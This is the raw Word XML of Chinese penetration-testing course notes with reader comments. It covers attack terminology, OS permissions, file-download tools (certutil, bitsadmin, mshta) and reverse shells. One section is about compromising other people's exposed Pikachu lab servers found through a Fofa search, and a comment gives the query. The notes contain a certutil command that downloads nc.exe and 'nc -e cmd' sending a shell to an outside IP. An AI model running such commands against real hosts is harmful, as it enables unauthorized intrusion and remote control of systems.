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基础入门-操作系统&amp;名词&amp;文件下载&amp;反弹SHELL&amp;防火墙绕过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commentRangeStart w:id="0"/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729655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1、名词解释-渗透测试-漏洞&amp;攻击&amp;后门&amp;代码&amp;专业词</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2、必备技能-操作系统-用途&amp;命令&amp;权限&amp;用户&amp;防火墙</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3、必备技能-文件下载-缘由&amp;场景&amp;使用-提权&amp;后渗透</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">4、必备技能-反弹命令-缘由&amp;场景&amp;使用-</w:t>
      </w:r>
      <w:commentRangeStart w:id="1"/>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r>
        <w:commentReference w:id="1"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">提权&amp;后渗透</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:commentRangeStart w:id="2"/>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:commentRangeEnd w:id="2"/>
      <w:r>
        <w:commentReference w:id="2"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">前后端，</w:t>
      </w:r>
      <w:commentRangeStart w:id="3"/>
      <w:r>
        <w:t xml:space="preserve">POC/EXP，Payload/Shellcode</w:t>
      </w:r>
      <w:commentRangeEnd w:id="3"/>
      <w:r>
        <w:commentReference w:id="3"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，后门/Webshell，木马/病毒，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">反弹，回显，跳板，黑白盒测试，暴力破解，社会工程学，撞库，</w:t>
      </w:r>
      <w:commentRangeStart w:id="4"/>
      <w:r>
        <w:t xml:space="preserve">ATT&amp;CK</w:t>
      </w:r>
      <w:commentRangeEnd w:id="4"/>
      <w:r>
        <w:commentReference w:id="4"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">参考：</w:t>
      </w:r>
      <w:commentRangeStart w:id="5"/>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:commentRangeEnd w:id="5"/>
      <w:r>
        <w:commentReference w:id="5"/>
      </w:r>
    </w:p>
    <w:p>
      <w:commentRangeStart w:id="6"/>
      <w:r>
        <w:t xml:space="preserve">https://www.cnblogs.com/sunny11/p/13583083.html</w:t>
      </w:r>
      <w:commentRangeEnd w:id="6"/>
      <w:r>
        <w:commentReference w:id="6"/>
      </w:r>
    </w:p>
    <w:p>
      <w:commentRangeStart w:id="7"/>
      <w:r>
        <w:t xml:space="preserve">https://forum.ywhack.com/bountytips.php?d</w:t>
      </w:r>
      <w:commentRangeStart w:id="8"/>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:commentRangeEnd w:id="8"/>
      <w:r>
        <w:commentReference w:id="8"/>
      </w:r>
      <w:commentRangeStart w:id="9"/>
      <w:commentRangeEnd w:id="9"/>
      <w:r>
        <w:commentReference w:id="9"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ownload</w:t>
      </w:r>
      <w:commentRangeEnd w:id="7"/>
      <w:r>
        <w:commentReference w:id="7"/>
      </w:r>
    </w:p>
    <w:p>
      <w:commentRangeStart w:id="10"/>
      <w:r>
        <w:t xml:space="preserve">https://forum.ywhack.com/reverse-shell/</w:t>
      </w:r>
      <w:commentRangeEnd w:id="10"/>
      <w:r>
        <w:commentReference w:id="10"/>
      </w:r>
    </w:p>
    <w:p>
      <w:commentRangeStart w:id="11"/>
      <w:r>
        <w:t xml:space="preserve">https://blog.csdn.net/weixin_43303273/article/details/83029138</w:t>
      </w:r>
      <w:commentRangeEnd w:id="11"/>
      <w:r>
        <w:commentReference w:id="11"/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</w:t>
      </w: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例：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基础案例1：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操作系统-用途&amp;命令&amp;权限&amp;用户&amp;防火墙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实用案例1：文件上传下载-解决无图形化&amp;解决数据传输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实用案例2：反弹Shell命令-解决数据回显&amp;解决数据通讯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结合案例1：防火墙绕过-正向连接&amp;反向连接&amp;内网服务器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结合案例2：学会了有手就行-Fofa拿下同行Pikachu服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">#基础案例1：操作系统-用途&amp;命令&amp;权限&amp;用户&amp;防火墙</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1、个人计算机&amp;</w:t>
      </w:r>
      <w:commentRangeStart w:id="12"/>
      <w:r>
        <w:t xml:space="preserve">服务器用机</w:t>
      </w:r>
      <w:commentRangeEnd w:id="12"/>
      <w:r>
        <w:commentReference w:id="12"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2、Windows&amp;Linux常见命令</w:t>
      </w:r>
      <w:commentRangeStart w:id="13"/>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:commentRangeEnd w:id="13"/>
      <w:r>
        <w:commentReference w:id="13"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3、</w:t>
      </w:r>
      <w:commentRangeStart w:id="14"/>
      <w:commentRangeStart w:id="15"/>
      <w:commentRangeStart w:id="16"/>
      <w:commentRangeStart w:id="17"/>
      <w:commentRangeStart w:id="18"/>
      <w:r>
        <w:t xml:space="preserve">文件权限&amp;服务权限&amp;用户权限等</w:t>
      </w:r>
      <w:commentRangeEnd w:id="14"/>
      <w:commentRangeEnd w:id="15"/>
      <w:commentRangeEnd w:id="16"/>
      <w:commentRangeEnd w:id="17"/>
      <w:commentRangeEnd w:id="18"/>
      <w:r>
        <w:commentReference w:id="14"/>
      </w:r>
      <w:r>
        <w:commentReference w:id="15"/>
      </w:r>
      <w:r>
        <w:commentReference w:id="16"/>
      </w:r>
      <w:r>
        <w:commentReference w:id="17"/>
      </w:r>
      <w:r>
        <w:commentReference w:id="18"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">4、系统用户&amp;用户组&amp;服务用户等分类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">5、</w:t>
      </w:r>
      <w:commentRangeStart w:id="19"/>
      <w:commentRangeStart w:id="20"/>
      <w:r>
        <w:t xml:space="preserve">自带防火墙出站&amp;入站规则策略协议</w:t>
      </w:r>
      <w:commentRangeEnd w:id="19"/>
      <w:commentRangeEnd w:id="20"/>
      <w:r>
        <w:commentReference w:id="19"/>
      </w:r>
      <w:r>
        <w:commentReference w:id="20"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">#实用案例1：文件上传下载-解决无图形化&amp;解决数据传输</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Linux：wget curl python ruby perl java等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Windows：PowerShell Certutil Bitsadmin msiexec mshta rundll32等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">#实用案例2：</w:t>
      </w:r>
      <w:commentRangeStart w:id="21"/>
      <w:r>
        <w:t xml:space="preserve">反弹Shell命令</w:t>
      </w:r>
      <w:commentRangeEnd w:id="21"/>
      <w:r>
        <w:commentReference w:id="21"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-解决数据回显&amp;解决数据通讯</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">useradd 用户名 passwd 用户名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">测试Linux系统添加用户或修改密码命令交互回显问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">#结合案例1：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">防火墙绕过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:commentRangeStart w:id="22"/>
      <w:r>
        <w:t xml:space="preserve">正向连接&amp;反向连接</w:t>
      </w:r>
      <w:commentRangeEnd w:id="22"/>
      <w:r>
        <w:commentReference w:id="22"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&amp;内网服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1、内网：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">内网 -&gt; xiaodi8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">xiaodi8 !-&gt; 内网</w:t>
      </w:r>
      <w:commentRangeStart w:id="23"/>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:commentRangeEnd w:id="23"/>
      <w:r>
        <w:commentReference w:id="23"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2、防火墙：</w:t>
      </w:r>
      <w:commentRangeStart w:id="24"/>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:commentRangeEnd w:id="24"/>
      <w:r>
        <w:commentReference w:id="24"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">xiaodi8 &lt;-&gt; aliyun</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">xiaodi8防火墙 -&gt; aliyun</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">aliyun !-&gt; xiaodi8防火墙</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">#结合案例2：学会了有手就行-</w:t>
      </w:r>
      <w:commentRangeStart w:id="25"/>
      <w:r>
        <w:t xml:space="preserve">Fofa</w:t>
      </w:r>
      <w:commentRangeEnd w:id="25"/>
      <w:r>
        <w:commentReference w:id="25"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">拿下同行Pikachu服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">文件下载&amp;反弹Shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">certutil -urlcache -split -f http://www.xiaodi8.com/nc.exe nc.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:commentRangeStart w:id="26"/>
      <w:r>
        <w:t xml:space="preserve">nc -e cmd 47.75.212.155 5566</w:t>
      </w:r>
      <w:commentRangeEnd w:id="26"/>
      <w:r>
        <w:commentReference w:id="26"/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StC01c" w:date="2022-03-19T17:28:14Z" w:id="0">
    <w:p w14:paraId="324b1a9f" w14:textId="3920cd52">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>‍wx2822</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="VC-chen" w:date="2022-06-13T20:44:42Z" w:id="1">
    <w:p w14:paraId="3ad6c058" w14:textId="30d4619a">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>‍vzyq4t</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="#include" w:date="2022-03-02T23:47:20Z" w:id="2">
    <w:p w14:paraId="3f951756" w14:textId="337367c5">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>‍cwfdmg</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="Ggf" w:date="2021-12-06T14:54:32Z" w:id="3">
    <w:p w14:paraId="351ba61c" w14:textId="3d0d6ef0">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>想象自己是一个特工，你的目标是监控一个重要的人（渗透目标），有一天你怀疑目标家里的窗子可能没有关，于是你上前推了推，结果推开了，这是一个POC。之后你回去了，开始准备第二天的渗透计划，第二天你通过同样的漏洞渗透进了它家，仔细查看了所有的重要文件，离开时还安装了一个隐蔽的窃听器，这一天你所做的就是一个EXP（通过漏洞做的一系列攻击动作），你在他家所做的就是不同的Payload，就把窃听器当作Shellcode吧！</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="老坑" w:date="2021-11-29T20:26:11Z" w:id="4">
    <w:p w14:paraId="3b0d4186" w14:textId="3082090c">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>百度 ATT&amp;CK</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="j0ker_k" w:date="2022-01-09T22:15:36Z" w:id="5">
    <w:p w14:paraId="36deaddf" w14:textId="3f66a531">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>‍89ghxw</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="丫丫蜜呀" w:date="2021-11-30T08:48:46Z" w:id="6">
    <w:p w14:paraId="301fbe70" w14:textId="3c0e473f">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>常用专业术语</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="丫丫蜜呀" w:date="2021-11-30T08:49:56Z" w:id="7">
    <w:p w14:paraId="3ce37f74" w14:textId="3ff0ab26">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>棱角下载命令生成</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="文轩" w:date="2022-01-14T22:42:36Z" w:id="8">
    <w:p w14:paraId="36e18046" w14:textId="3b4cf95b">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>棱角专业术语生成</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="寒波映月" w:date="2022-02-07T14:36:57Z" w:id="9">
    <w:p w14:paraId="34276600" w14:textId="3dda0ead">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>‍n2nuyl</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="丫丫蜜呀" w:date="2021-11-30T08:53:13Z" w:id="10">
    <w:p w14:paraId="3c01fe76" w14:textId="3930e6fb">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>反弹shell命令生成</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="丫丫蜜呀" w:date="2021-11-30T08:54:31Z" w:id="11">
    <w:p w14:paraId="36a76bef" w14:textId="3051b0aa">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>渗透常用命令Linux,cmd,powershell</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="ㅤㅤㅤㅤ" w:date="2021-11-29T20:28:29Z" w:id="12">
    <w:p w14:paraId="36378826" w14:textId="366a19d2">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2008或2012</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="年蚀" w:date="2021-12-02T10:04:55Z" w:id="13">
    <w:p w14:paraId="362030e9" w14:textId="3ca74146">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>区分cmd和powershell看看有没有powershell前缀有没有区分大小写，如果有则是powershell反之则是cmd</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="北有执念" w:date="2021-11-29T20:36:07Z" w:id="14">
    <w:p w14:paraId="37ea20cb" w14:textId="37728ad7">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>为什么要提权，目前的权限不够完成目标</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="北有执念" w:date="2021-11-29T20:40:05Z" w:id="15">
    <w:p w14:paraId="33fd1928" w14:textId="375ed03f">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>加上S表示用户组</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="北有执念" w:date="2021-11-29T20:40:56Z" w:id="16">
    <w:p w14:paraId="39de4c0c" w14:textId="3c46d962">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>用户的权限受到用户组权限的影响</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="北有执念" w:date="2021-11-29T20:43:22Z" w:id="17">
    <w:p w14:paraId="3ee6a9db" w14:textId="3d6248f1">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>system不是最高权限。adminS。。。才是</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="Jonas丶L" w:date="2021-11-29T22:20:14Z" w:id="18">
    <w:p w14:paraId="3839f3c3" w14:textId="3e59626d">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>windows里system比admin权限高</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="北有执念" w:date="2021-11-29T20:45:40Z" w:id="19">
    <w:p w14:paraId="31e5f088" w14:textId="386a4622">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="北有执念" w:date="2021-11-29T20:48:37Z" w:id="20">
    <w:p w14:paraId="39d24850" w14:textId="3264a8ac">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>策略看攻击者走的哪些协议</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="北有执念" w:date="2021-11-29T21:07:46Z" w:id="21">
    <w:p w14:paraId="3a589ed7" w14:textId="3ebb39a7">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>PORSCHE</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="北有执念" w:date="2021-11-29T21:38:48Z" w:id="22">
    <w:p w14:paraId="379a3576" w14:textId="35835504">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>正向是你找别人，主动去连接，反向是别人找你</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="^_^struggle" w:date="2022-03-28T18:59:42Z" w:id="23">
    <w:p w14:paraId="3c251f65" w14:textId="3468a500">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>()j</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="Nn" w:date="2021-11-30T22:36:47Z" w:id="24">
    <w:p w14:paraId="38296cce" w14:textId="3a14f5da">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>‍lwe2xl</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="年蚀" w:date="2021-12-01T16:27:14Z" w:id="25">
    <w:p w14:paraId="325a2807" w14:textId="3a2970fe">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>"pikachu" &amp;&amp; country="CN"&amp;&amp;"Get the pikachu"</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="年蚀" w:date="2021-12-02T10:24:56Z" w:id="26">
    <w:p w14:paraId="34b43048" w14:textId="38cadf68">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>将cmd权限移交给ip为47.75.212.155 的5577端口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24b1a9f" w15:done="0"/>
  <w15:commentEx w15:paraId="3ad6c058" w15:done="0"/>
  <w15:commentEx w15:paraId="3f951756" w15:done="0"/>
  <w15:commentEx w15:paraId="351ba61c" w15:done="0"/>
  <w15:commentEx w15:paraId="3b0d4186" w15:done="0"/>
  <w15:commentEx w15:paraId="36deaddf" w15:done="0"/>
  <w15:commentEx w15:paraId="301fbe70" w15:done="0"/>
  <w15:commentEx w15:paraId="3ce37f74" w15:done="0"/>
  <w15:commentEx w15:paraId="36e18046" w15:done="0"/>
  <w15:commentEx w15:paraId="34276600" w15:done="0"/>
  <w15:commentEx w15:paraId="3c01fe76" w15:done="0"/>
  <w15:commentEx w15:paraId="36a76bef" w15:done="0"/>
  <w15:commentEx w15:paraId="36378826" w15:done="0"/>
  <w15:commentEx w15:paraId="362030e9" w15:done="0"/>
  <w15:commentEx w15:paraId="37ea20cb" w15:done="0"/>
  <w15:commentEx w15:paraId="33fd1928" w15:paraIdParent="37ea20cb" w15:done="0"/>
  <w15:commentEx w15:paraId="39de4c0c" w15:paraIdParent="37ea20cb" w15:done="0"/>
  <w15:commentEx w15:paraId="3ee6a9db" w15:paraIdParent="37ea20cb" w15:done="0"/>
  <w15:commentEx w15:paraId="3839f3c3" w15:paraIdParent="37ea20cb" w15:done="0"/>
  <w15:commentEx w15:paraId="31e5f088" w15:done="0"/>
  <w15:commentEx w15:paraId="39d24850" w15:paraIdParent="31e5f088" w15:done="0"/>
  <w15:commentEx w15:paraId="3a589ed7" w15:done="0"/>
  <w15:commentEx w15:paraId="379a3576" w15:done="0"/>
  <w15:commentEx w15:paraId="3c251f65" w15:done="0"/>
  <w15:commentEx w15:paraId="38296cce" w15:done="0"/>
  <w15:commentEx w15:paraId="325a2807" w15:done="0"/>
  <w15:commentEx w15:paraId="34b430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